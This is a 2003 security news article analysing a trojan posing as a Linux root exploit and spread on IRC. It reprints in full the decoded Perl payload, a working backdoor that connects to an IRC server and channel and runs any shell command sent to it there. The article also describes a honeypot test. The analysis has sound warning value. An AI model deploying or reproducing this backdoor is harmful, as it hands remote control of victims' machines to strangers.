R o o t s e c u r e . n e t
The Security News Site For Systems Administrators & Hackers Saturday, 2nd August 2014 @ 03:25:37 GMT 
Reports | Reverse command execution exploit via IRC analysis
{15th Jun 2003}
Back in May Rootsecure.net reported how "hackers" were distributing code on the pretence of it being a remote exploit or similar, which in fact exploited the user who ran it by e.g. adding a new root account / deleting files.

Since then a further arguably more dangerous so called exploit has come to light, which if successfully executed grants anyone control of the host machine via IRC - The same method used to distribute it, along with the message "new root exploit is out to slackware 9.1 and redhat 9.1! enjoy....be nice to your frinds boxes!" and a link to http://home.no/exploited/exploits/kmodaxx.c.

The link contains realistic looking source code written in C, along with a block of shellcode. The shellcode (executed by the C) decodes to the following Perl script:

----
#!/usr/bin/perl

$chan="#darknet";
$nick="moron";
$server="efnet.vuurwerk.nl";

$SIG{TERM}={};
exit if fork;

use IO::Socket;

$sock = IO::Socket::INET->new($server.":6667")||exit;

print $sock "USER moron +i moron :moronv2\nNICK moron\n";

$i=1;

while(<$sock>=~/^[^ ]+ ([^ ]+) /){

    $mode=$1;
    last if $mode=="001";

    if($mode=="433"){
        $i++;
        $nick=~s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}

print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran 
a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: 
".$nick.": command\n";

while (<$sock>){

    if (/^PING (.*)$/){
        print $sock "PONG $1\nJOIN $chan\n";
    }

    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_=`$_`;

        foreach (split "\n") {
            print $sock "PRIVMSG $chan :$_\n";
            sleep 1;
        }
    }
}

#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
              

The Perl script connects to the IRC server "efnet.vuurwerk.nl" on channel "#darknet", issuing the message:

Hi, Im a moron that ran a fake 0day exploit. v2
to run commands on me, type: moron: command


In an attempt to first discover if anyone was actually in the channel, and willing to take advantage of those that had run the exploit Rootsecure.net ran a modified version of the code, which simply connected, logging all messages to the console. A number of commands were sent to the bot, including "ls" and a CTCP version request, most likely in an attempt to confirm that it was not simply just someone on MIRC pretending to someone who had run the script.

Since there was interest in the bot a honeypot machine was setup, running the original Perl script, however by this time the #darknet channel had begun issuing the message "Nick/channel is temporarily unavailable" preventing anyone from joining.

Note: To decode the shellcode using Perl, open a new file, type $code=, copy over the code adding full stops after each quoted line, add $code =~ s/;/;\n/g; print $code; to the end of the file, then execute it.
 

Related Links:

Hackers Hack 'Script Kiddies', Rootsecure.net
-1 day exploit - Warning, Full Disclosure